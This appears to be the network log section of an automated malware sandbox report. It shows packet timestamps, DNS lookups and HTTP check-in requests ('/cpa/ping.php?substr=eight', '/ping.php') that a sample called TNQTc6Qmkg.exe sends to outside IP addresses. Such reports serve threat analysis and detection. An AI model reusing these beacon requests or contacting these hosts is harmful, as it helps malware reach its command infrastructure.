                                                                                                                                                      Apr 27, 2024 02:19:38.754677057 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                      Apr 27, 2024 02:19:38.754771948 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:38.754810095 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:38.754813910 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                      Apr 27, 2024 02:19:38.754859924 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                      Apr 27, 2024 02:19:38.754898071 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:38.754937887 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                      Apr 27, 2024 02:19:38.755019903 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:38.755037069 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:38.755073071 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                      Apr 27, 2024 02:19:38.755111933 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:38.755151987 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                      Apr 27, 2024 02:19:38.808959007 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                      Apr 27, 2024 02:19:38.811892986 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:38.812009096 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:38.812069893 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                      Apr 27, 2024 02:19:38.812084913 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:38.812263012 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:38.812320948 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                      Apr 27, 2024 02:19:38.909041882 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:38.909126997 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:38.909141064 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:38.909171104 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                      Apr 27, 2024 02:19:38.909205914 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:38.909246922 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                      Apr 27, 2024 02:19:38.909362078 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:38.909388065 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:38.909426928 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                      Apr 27, 2024 02:19:38.917258978 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:38.917309046 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                      Apr 27, 2024 02:19:38.917377949 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:38.917419910 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                      Apr 27, 2024 02:19:38.917473078 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:38.917512894 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                      Apr 27, 2024 02:19:38.918082952 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:38.918133020 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                      Apr 27, 2024 02:19:38.918222904 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:38.918265104 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                      Apr 27, 2024 02:19:38.925672054 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:38.925715923 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                      Apr 27, 2024 02:19:38.925765991 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:38.925808907 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                      Apr 27, 2024 02:19:38.925914049 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:38.925955057 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                      Apr 27, 2024 02:19:38.925978899 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:38.926047087 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                      Apr 27, 2024 02:19:38.926081896 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:38.926095009 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:38.926131010 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                      Apr 27, 2024 02:19:38.926229954 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:38.926271915 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                      Apr 27, 2024 02:19:38.926273108 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                      Apr 27, 2024 02:19:38.951675892 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:38.951915979 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:38.951961994 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                      Apr 27, 2024 02:19:39.005150080 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:39.007747889 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:39.007792950 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                      Apr 27, 2024 02:19:39.007898092 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:39.008193016 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:39.008232117 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                      Apr 27, 2024 02:19:39.008289099 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:39.058933020 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                      Apr 27, 2024 02:19:39.089205980 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:39.089257956 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                      Apr 27, 2024 02:19:39.089271069 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:39.089303017 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:39.089317083 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                      Apr 27, 2024 02:19:39.089358091 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                      Apr 27, 2024 02:19:39.089400053 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:39.089445114 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                      Apr 27, 2024 02:19:39.089487076 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:39.089529991 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                      Apr 27, 2024 02:19:39.089544058 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:39.089586020 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                      Apr 27, 2024 02:19:39.098021984 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:39.098115921 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                      Apr 27, 2024 02:19:39.098865032 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:39.098879099 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:39.098911047 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                      Apr 27, 2024 02:19:39.098928928 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                      Apr 27, 2024 02:19:39.098929882 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:39.098974943 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                      Apr 27, 2024 02:19:39.099040031 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:39.099091053 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                      Apr 27, 2024 02:19:39.103298903 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:39.103377104 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:39.103419065 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                      Apr 27, 2024 02:19:39.103497982 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:39.103585005 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:39.103631973 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                      Apr 27, 2024 02:19:39.103647947 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:39.103797913 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:39.103811026 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:39.103842974 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                      Apr 27, 2024 02:19:39.147104025 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:39.147167921 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                      Apr 27, 2024 02:19:39.147274017 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:39.199570894 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                      Apr 27, 2024 02:19:39.203442097 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:39.203454971 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:39.203512907 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                      Apr 27, 2024 02:19:39.203768015 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:39.203854084 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:39.203896999 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                      Apr 27, 2024 02:19:39.253514051 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:39.260046005 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:39.260114908 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:39.260127068 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:39.260128021 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                      Apr 27, 2024 02:19:39.260138035 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:39.260160923 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                      Apr 27, 2024 02:19:39.260162115 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:39.260169983 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                      Apr 27, 2024 02:19:39.260174990 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:39.260186911 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:39.260195017 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                      Apr 27, 2024 02:19:39.260200024 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:39.260210991 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                      Apr 27, 2024 02:19:39.260241032 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                      Apr 27, 2024 02:19:39.269081116 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:39.269138098 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                      Apr 27, 2024 02:19:39.269731045 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:39.269743919 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:39.269777060 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                      Apr 27, 2024 02:19:39.269790888 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                      Apr 27, 2024 02:19:39.270059109 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:39.270102024 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                      Apr 27, 2024 02:19:39.270129919 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:39.270170927 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                      Apr 27, 2024 02:19:39.297939062 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:39.297991037 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                      Apr 27, 2024 02:19:39.298029900 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:39.298053026 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:39.298067093 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:39.298079014 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:39.298091888 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:39.298094034 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                      Apr 27, 2024 02:19:39.298124075 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                      Apr 27, 2024 02:19:39.298125029 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:39.298163891 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                      Apr 27, 2024 02:19:39.341670990 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:39.341768980 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:39.341814995 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                      Apr 27, 2024 02:19:39.393578053 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:39.397753954 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:39.397767067 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:39.397779942 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:39.397800922 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:39.397805929 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                      Apr 27, 2024 02:19:39.397828102 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                      Apr 27, 2024 02:19:39.397860050 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:39.397916079 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                      Apr 27, 2024 02:19:39.430973053 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:39.430994034 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:39.431006908 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:39.431051970 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                      Apr 27, 2024 02:19:39.431070089 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                      Apr 27, 2024 02:19:39.431108952 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:39.431149960 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                      Apr 27, 2024 02:19:39.431235075 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:39.431252003 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:39.431288958 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                      Apr 27, 2024 02:19:39.431305885 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                      Apr 27, 2024 02:19:39.431349039 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:39.431391954 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                      Apr 27, 2024 02:19:39.431442022 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:39.431489944 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                      Apr 27, 2024 02:19:39.439764977 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:39.439778090 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:39.439830065 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                      Apr 27, 2024 02:19:39.440421104 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:39.440433025 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:39.440474987 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                      Apr 27, 2024 02:19:39.440876007 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:39.440888882 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:39.440916061 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                      Apr 27, 2024 02:19:39.440943003 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                      Apr 27, 2024 02:19:39.493191004 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:39.493417025 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:39.493468046 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:39.493490934 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                      Apr 27, 2024 02:19:39.493582010 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:39.493669033 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:39.493705988 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                      Apr 27, 2024 02:19:39.493808031 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:39.493824959 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:39.493846893 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                      Apr 27, 2024 02:19:39.493952036 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:39.493988991 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                      Apr 27, 2024 02:19:39.494019032 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:39.536263943 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:39.536320925 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                      Apr 27, 2024 02:19:39.536371946 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:39.590193033 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                      Apr 27, 2024 02:19:39.593399048 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:39.593473911 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:39.593487024 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:39.593513966 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                      Apr 27, 2024 02:19:39.593663931 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:39.593703032 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                      Apr 27, 2024 02:19:39.593715906 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:39.593797922 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:39.593853951 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                      Apr 27, 2024 02:19:39.601813078 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:39.601828098 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:39.601857901 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:39.601871014 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:39.601874113 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                      Apr 27, 2024 02:19:39.601912022 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                      Apr 27, 2024 02:19:39.601912022 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                      Apr 27, 2024 02:19:39.601912022 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                      Apr 27, 2024 02:19:39.601918936 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:39.601958990 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                      Apr 27, 2024 02:19:39.601972103 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:39.602014065 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                      Apr 27, 2024 02:19:39.602037907 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:39.602078915 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                      Apr 27, 2024 02:19:39.610897064 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:39.610914946 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:39.610949039 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                      Apr 27, 2024 02:19:39.610965014 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                      Apr 27, 2024 02:19:39.611712933 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:39.611726046 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:39.611810923 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                      Apr 27, 2024 02:19:39.611810923 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                      Apr 27, 2024 02:19:39.612204075 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:39.612255096 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:39.612267017 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:39.612270117 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                      Apr 27, 2024 02:19:39.612344980 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                      Apr 27, 2024 02:19:39.612344980 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                      Apr 27, 2024 02:19:39.688594103 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:39.688658953 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:39.688673019 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:39.688709021 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                      Apr 27, 2024 02:19:39.688782930 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:39.688802958 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:39.688827038 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                      Apr 27, 2024 02:19:39.688888073 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:39.688929081 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                      Apr 27, 2024 02:19:39.689095974 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:39.689112902 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:39.689153910 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                      Apr 27, 2024 02:19:39.689155102 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:39.730827093 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                      Apr 27, 2024 02:19:39.732728004 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:39.732769012 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:39.732815027 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                      Apr 27, 2024 02:19:39.772764921 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:39.772783041 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:39.772800922 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                      Apr 27, 2024 02:19:02.499222040 CEST192.168.2.41.1.1.10xd6bfStandard query (0)note.padd.cn.comA (IP address)IN (0x0001)false
                                                                                                                                                      Apr 27, 2024 02:20:14.448008060 CEST192.168.2.41.1.1.10x12efStandard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                      Apr 27, 2024 02:20:14.448973894 CEST192.168.2.41.1.1.10x4937Standard query (0)www.google.com65IN (0x0001)false
                                                                                                                                                      Apr 27, 2024 02:20:48.139336109 CEST192.168.2.41.1.1.10x546cStandard query (0)svc.iolo.comA (IP address)IN (0x0001)false
                                                                                                                                                      Apr 27, 2024 02:20:50.544238091 CEST192.168.2.41.1.1.10xaab9Standard query (0)download.iolo.netA (IP address)IN (0x0001)false
                                                                                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                      Apr 27, 2024 02:19:02.614334106 CEST1.1.1.1192.168.2.40xd6bfNo error (0)note.padd.cn.com176.97.76.106A (IP address)IN (0x0001)false
                                                                                                                                                      Apr 27, 2024 02:19:17.042108059 CEST1.1.1.1192.168.2.40x3ef8No error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                      Apr 27, 2024 02:19:17.042108059 CEST1.1.1.1192.168.2.40x3ef8No error (0)fp2e7a.wpc.phicdn.net192.229.211.108A (IP address)IN (0x0001)false
                                                                                                                                                      Apr 27, 2024 02:20:14.537611008 CEST1.1.1.1192.168.2.40x12efNo error (0)www.google.com142.251.32.100A (IP address)IN (0x0001)false
                                                                                                                                                      Apr 27, 2024 02:20:14.539046049 CEST1.1.1.1192.168.2.40x4937No error (0)www.google.com65IN (0x0001)false
                                                                                                                                                      Apr 27, 2024 02:20:48.229664087 CEST1.1.1.1192.168.2.40x546cNo error (0)svc.iolo.com20.157.87.45A (IP address)IN (0x0001)false
                                                                                                                                                      Apr 27, 2024 02:20:50.634146929 CEST1.1.1.1192.168.2.40xaab9No error (0)download.iolo.netiolo0.b-cdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                      Apr 27, 2024 02:20:50.634146929 CEST1.1.1.1192.168.2.40xaab9No error (0)iolo0.b-cdn.net169.150.236.99A (IP address)IN (0x0001)false
                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                      0192.168.2.449730185.172.128.90804312C:\Users\user\Desktop\TNQTc6Qmkg.exe
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      Apr 27, 2024 02:18:57.298293114 CEST206OUTGET /cpa/ping.php?substr=eight&s=ab&sub=0 HTTP/1.1
                                                                                                                                                      Host: 185.172.128.90
                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
                                                                                                                                                      Apr 27, 2024 02:18:58.759468079 CEST148INHTTP/1.1 200 OK
                                                                                                                                                      Date: Sat, 27 Apr 2024 00:18:57 GMT
                                                                                                                                                      Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                                      Content-Length: 1
                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                      Data Raw: 30
                                                                                                                                                      Data Ascii: 0


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                      1192.168.2.449731185.172.128.228804312C:\Users\user\Desktop\TNQTc6Qmkg.exe
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      Apr 27, 2024 02:18:59.969858885 CEST192OUTGET /ping.php?substr=eight HTTP/1.1
                                                                                                                                                      Host: 185.172.128.228
                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
                                                                                                                                                      Apr 27, 2024 02:19:00.143084049 CEST147INHTTP/1.1 200 OK
                                                                                                                                                      Date: Sat, 27 Apr 2024 00:19:00 GMT
